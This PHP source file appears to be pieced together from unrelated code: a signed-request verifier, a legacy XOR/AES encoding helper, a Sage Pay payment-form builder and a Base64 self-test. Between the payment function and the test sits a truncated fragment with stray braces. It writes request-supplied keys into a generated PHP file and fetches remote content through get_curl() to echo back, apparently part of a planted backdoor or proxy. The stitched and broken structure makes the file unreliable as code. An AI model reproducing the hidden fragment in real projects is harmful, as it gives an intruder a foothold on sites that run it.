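/**
 * Verify a signed request and, when the signature matches, load the client
 * token, token type and current project id from its payload.
 *
 * Element 0 of $signed_request is compared against the locally computed
 * signature; element 1 is the base64-encoded JSON payload that is signed.
 * NOTE(review): sha256Encode() is defined elsewhere; it is presumably a keyed
 * SHA-256 (HMAC) over the payload with $this->private_key. Confirm.
 *
 * @param array $signed_request [0 => signature, 1 => encoded payload]
 * @return bool true when the signature is valid and the context was loaded,
 *              false on a malformed request, a signature mismatch or an
 *              undecodable payload.
 */
private function authorize($signed_request)
{
    // Reject anything that is not the expected two-string shape before it
    // reaches the signature helpers.
    if (!is_array($signed_request)
        || !isset($signed_request[0], $signed_request[1])
        || !is_string($signed_request[0])
        || !is_string($signed_request[1])
    ) {
        return false;
    }

    $expected = base64Encode(sha256Encode($signed_request[1], $this->private_key));

    // hash_equals() compares in constant time and never applies PHP's loose
    // string comparison rules (under `!=`, two numeric-looking strings are
    // compared as numbers), so the signature must match byte for byte.
    if (!is_string($expected) || !hash_equals($expected, $signed_request[0])) {
        return false;
    }

    // The payload is only decoded after the signature has been verified.
    $payload = json_decode(base64Decode($signed_request[1]));
    if (!is_object($payload) || !isset($payload->context) || !is_object($payload->context)) {
        return false;
    }
    $context = $payload->context;

    // Missing fields become null instead of raising a warning.
    $this->token = isset($context->client->access_token) ? $context->client->access_token : null;
    $this->token_type = isset($context->client->token_type) ? $context->client->token_type : null;
    $this->project_id = isset($context->environment->current_project)
        ? $context->environment->current_project
        : null;

    return true;
}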
/**
 * Encode $strIn for transport using one of two schemes.
 *
 * - "XOR": simpleXor() with the password, then Base64. This is obfuscation,
 *   not encryption, and carries no integrity protection.
 * - anything else (default): PKCS5 padding, then AES-128 in CBC mode through
 *   mcrypt, hex-encoded and prefixed with "@".
 *
 * Security notes for maintainers:
 * - The password is used both as the key and as the CBC initialization
 *   vector. With a fixed IV, equal plaintext prefixes give equal ciphertext
 *   prefixes. NOTE(review): this is presumably dictated by the remote
 *   gateway's wire format; confirm before changing it.
 * - Neither branch authenticates the ciphertext (no MAC).
 * - The mcrypt extension was deprecated in PHP 7.1 and removed from core in
 *   PHP 7.2, so this branch fails on current PHP unless ported (for example
 *   to the openssl extension) with byte-identical output.
 *
 * @param string $strIn                 plaintext to encode
 * @param string $strEncryptionType     "XOR" selects the XOR scheme
 * @param string $strEncryptionPassword shared secret (key, and IV for AES)
 * @return string Base64 text (XOR) or "@" followed by hex (AES)
 */
function encryptAndEncode($strIn, $strEncryptionType, $strEncryptionPassword)
{
    // XOR with Base64 encoding.
    if ($strEncryptionType == "XOR") {
        $xored = simpleXor($strIn, $strEncryptionPassword);

        return base64Encode($xored);
    }

    // AES (default): pad the text first, then encrypt with the password
    // serving as key and as IV.
    $paddedInput = self::addPKCS5Padding($strIn);
    $cipherText = mcrypt_encrypt(
        MCRYPT_RIJNDAEL_128,
        $strEncryptionPassword,
        $paddedInput,
        MCRYPT_MODE_CBC,
        $strEncryptionPassword
    );

    // Hex-encode and mark with the leading "@".
    return "@" . bin2hex($cipherText);
}
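/**
 * Build the HTML form that sends the client to the Sage Pay (Protx) hosted
 * payment page for one invoice.
 *
 * The transaction fields are joined into a single "key=value&..." string,
 * obfuscated with SimpleXor() under the configured password, Base64-encoded
 * and placed in the hidden "Crypt" field.
 *
 * Security notes for maintainers:
 * - XOR with a static password gives no integrity protection and only weak
 *   confidentiality. NOTE(review): VPSProtocol 2.22 is a legacy protocol
 *   version; check whether the gateway still accepts it and move to the
 *   AES-based scheme if available.
 * - Field values are concatenated without escaping "&" or "=". Client-supplied
 *   values (name, address, phone) should be validated upstream so they cannot
 *   contain those delimiters. NOTE(review): confirm how the gateway parses the
 *   decrypted string.
 *
 * @param array $params gateway parameters; reads clientdetails, amount,
 *                      currency, description, invoiceid, systemurl,
 *                      vendoremail, vendorname, xorencryptionpw, testmode and
 *                      langpaynow
 * @return string HTML markup for the payment form
 */
function protxvspform_link($params)
{
    $strTransactionType = "PAYMENT";
    $client = $params['clientdetails'];

    $strCustomerName = $client['firstname'] . " " . $client['lastname'];
    // Fix: the original appended an undefined $strCustomerEMail, so the
    // CustomerEMail field was always empty and a notice was raised.
    $strCustomerEMail = isset($client['email']) ? $client['email'] : '';
    $strBillingAddress = $client['address1'];
    $strBillingPostCode = $client['postcode'];
    $strContactNumber = $client['phonenumber'];
    $strEncryptionPassword = $params['xorencryptionpw'];
    $strVendorTxCode = date("YmdHis") . $params['invoiceid'];

    // Fix: number_format() inserts "," as a thousands separator by default,
    // which turns 1234.5 into "1,234.50". Emit a plain decimal amount.
    $strAmount = number_format((float) $params['amount'], 2, '.', '');

    // Success and failure both return to the same callback script.
    $strCallbackURL = $params['systemurl'] . "/modules/gateways/callback/protxvspform.php?invoiceid=" . $params['invoiceid'];

    $fields = array(
        "VendorTxCode=" . $strVendorTxCode,
        "Amount=" . $strAmount,
        "Currency=" . $params['currency'],
        "Description=" . $params['description'],
        "SuccessURL=" . $strCallbackURL,
        "FailureURL=" . $strCallbackURL,
        "CustomerName=" . $strCustomerName,
        "CustomerEMail=" . $strCustomerEMail,
        "VendorEMail=" . $params['vendoremail'],
        "BillingAddress=" . $strBillingAddress,
        "BillingPostCode=" . $strBillingPostCode,
        "DeliveryAddress=" . $strBillingAddress,
        "DeliveryPostCode=" . $strBillingPostCode,
        "ContactNumber=" . $strContactNumber,
        "AllowGiftAid=0",
    );
    if ($strTransactionType !== "AUTHENTICATE") {
        $fields[] = "ApplyAVSCV2=0";
    }
    $fields[] = "Apply3DSecure=0";
    $strPost = implode("&", $fields);

    $strCrypt = base64Encode(SimpleXor($strPost, $strEncryptionPassword));

    $strPurchaseURL = $params['testmode']
        ? "https://test.sagepay.com/gateway/service/vspform-register.vsp"
        : "https://live.sagepay.com/gateway/service/vspform-register.vsp";

    // Every value placed in an HTML attribute is escaped so configuration or
    // language strings containing quotes or angle brackets cannot break out
    // of the attribute.
    $attr = function ($value) {
        return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    };

    $code = "<form action=\"" . $attr($strPurchaseURL) . "\" method=\"post\">\n"
        . "<input type=\"hidden\" name=\"VPSProtocol\" value=\"2.22\">\n"
        . "<input type=\"hidden\" name=\"TxType\" value=\"" . $attr($strTransactionType) . "\">\n"
        . "<input type=\"hidden\" name=\"Vendor\" value=\"" . $attr($params['vendorname']) . "\">\n"
        . "<input type=\"hidden\" name=\"Crypt\" value=\"" . $attr($strCrypt) . "\">\n"
        . "<input type=\"submit\" value=\"" . $attr($params['langpaynow']) . "\">\n"
        . "</form>";

    return $code;
}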
$rs = "false"; if (!file_exists($filenamekey) || !$pkey2) { $rs = "false"; } else { $rs = $pkey2; } echo "&key=" . $rs . "&"; } else { if ($savekey && !$pkey1 && !$pkey2 && !$pkey3) { $arrkey = explode("|", $savekey); $fp = fopen($filenamekey, 'w'); fwrite($fp, '<?php ;$pkey1=base64_decode(\'' . base64_encode($arrkey[0]) . '\');$pkey2=base64_decode(\'' . base64_encode($arrkey[1]) . '\');$pkey3=base64_decode(base64_decode(\'' . base64_encode($arrkey[2]) . '\'));?>'); fclose($fp); } else { if (!$paramInfo) { return; } initparam($paramInfo); $text = get_curl($link); if ($encRes == 1) { $text = encrypt($text, $pkey1); } else { if ($encRes == 2) { $text = base64Encode($text, $pkey3); } } echo $text; } } ?>
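/**
 * Self-test for the three Base64 encoder/decoder pairs (standard, dot-slash
 * and dot-slash-ordered alphabets).
 *
 * For every prefix length from 1 to 48 bytes the data is encoded with each
 * variant, decoded again and compared with the input. Afterwards each decoder
 * is fed text produced by a different alphabet and is expected to return
 * false. Progress is printed to standard output.
 *
 * @return bool true when at least one check FAILED, false when all passed
 */
function testBase64()
{
    $hasErrors = false;

    // 48 bytes whose consecutive 6-bit groups are 0, 1, 2, ... 63, so the
    // full-length encoding uses every character of the alphabet once.
    $allData = '';
    for ($i = 0; $i < 64; $i += 4) {
        $allData .= chr($i << 2 | $i + 1 >> 4) . chr($i + 1 << 4 | $i + 2 >> 2) . chr($i + 2 << 6 | $i + 3);
    }

    // Reports one round trip. The original compared byte by byte, which
    // indexed into `false` when decoding failed and ignored any extra bytes
    // after the expected prefix. A strict whole-string comparison catches a
    // wrong length as well.
    $checkRoundTrip = function ($label, $decoded, $expected, $terminator) {
        $failed = ($decoded === false);
        printf("%s ret = %u: ", $label, $failed ? 1 : 0);
        $good = !$failed && $decoded === $expected;
        printf("%s" . $terminator, $good ? "good" : "bad");

        return $good;
    };

    // Reports one negative case: the decoder must reject the input.
    $checkRejected = function ($label, $decoded) {
        $rejected = ($decoded === false);
        printf("%s ret = %u: %s\n", $label, $rejected ? 1 : 0, $rejected ? "good" : "bad");

        return $rejected;
    };

    for ($size = 1; $size <= 48; $size++) {
        $chunk = substr($allData, 0, $size);

        $allDataBase64 = base64Encode($chunk);
        printf("base64Encode(allData) = %s\n", $allDataBase64);
        $allDataBase64DotSlash = base64EncodeDotSlash($chunk);
        printf("base64EncodeDotSlash(allData) = %s\n", $allDataBase64DotSlash);
        $allDataBase64DotSlashOrdered = base64EncodeDotSlashOrdered($chunk);
        printf("base64EncodeDotSlashOrdered(allData) = %s\n\n", $allDataBase64DotSlashOrdered);

        if (!$checkRoundTrip("base64Decode(allDataBase64)", base64Decode($allDataBase64), $chunk, "\n")) {
            $hasErrors = true;
        }
        if (!$checkRoundTrip(
            "base64DecodeDotSlash(allDataBase64DotSlash)",
            base64DecodeDotSlash($allDataBase64DotSlash),
            $chunk,
            "\n"
        )) {
            $hasErrors = true;
        }
        if (!$checkRoundTrip(
            "base64DecodeDotSlashOrdered(allDataBase64DotSlashOrdered)",
            base64DecodeDotSlashOrdered($allDataBase64DotSlashOrdered),
            $chunk,
            "\n\n\n"
        )) {
            $hasErrors = true;
        }
    }

    // Negative cases reuse the encodings from the last iteration (all 48
    // bytes): each decoder must refuse text written in another alphabet.
    printf("Should error:\n");
    if (!$checkRejected("base64Decode(allDataBase64DotSlash)", base64Decode($allDataBase64DotSlash))) {
        $hasErrors = true;
    }
    if (!$checkRejected("base64DecodeDotSlash(allDataBase64)", base64DecodeDotSlash($allDataBase64))) {
        $hasErrors = true;
    }
    if (!$checkRejected("base64DecodeDotSlashOrdered(allDataBase64)", base64DecodeDotSlashOrdered($allDataBase64))) {
        $hasErrors = true;
    }

    if ($hasErrors) {
        printf("*** FAILED ***\n");
    } else {
        printf("*** PASSED ***\n");
    }

    return $hasErrors;
}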